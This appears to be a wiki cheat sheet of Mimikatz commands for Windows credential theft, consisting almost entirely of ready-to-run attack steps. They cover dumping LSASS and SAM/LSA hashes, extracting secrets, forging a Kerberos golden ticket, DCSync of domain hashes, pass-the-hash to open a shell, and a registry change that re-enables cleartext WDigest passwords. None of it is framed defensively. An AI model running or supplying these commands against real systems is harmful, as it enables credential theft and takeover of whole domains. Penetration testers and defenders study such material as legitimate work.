Mimikatz
Jump to navigation
Jump to search
Elevate privileges
- privilege::debug
- token::elevate
Show recently logged on user credentials and hashes
- sekurlsa::logonpasswords
Dump lsass via task manager
Task Manager > Details > lsass.exe > Right click > Create dump file > lsass.DMP
- sekurlsa::minidump lsass.DMP
- sekurlsa::logonpasswords
Dump hashes
- lsadump::sam
- lsadump::lsa /patch
- lsadump::lsa /inject
- lsadump::cache
- sekurlsa::ekeys
Secrets
- lsadump::secrets
Create a golden ticket on the domain controller
- lsadump::lsa /inject /name:krbtgt
- kerberos::golden /user:<USER> /domain:<DOMAIN.LOCAL> /sid:<SID> /krbtgt:<KRBTGT> /id:<ID>
- misc::cmd
Retrieve the password hashes of user accounts from a domain controller
- lsadump::dcsync /user:<USER> /domain:<DOMAIN.LOCAL>
Pass the hash
- sekurlsa::pth /user:<USER> /domain:<DOMAIN.LOCAL> /ntlm:<HASH> /run:cmd
Wdigest - extracting passwords in cleartext
- sekurlsa::wdigest
Enable Wdigest
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f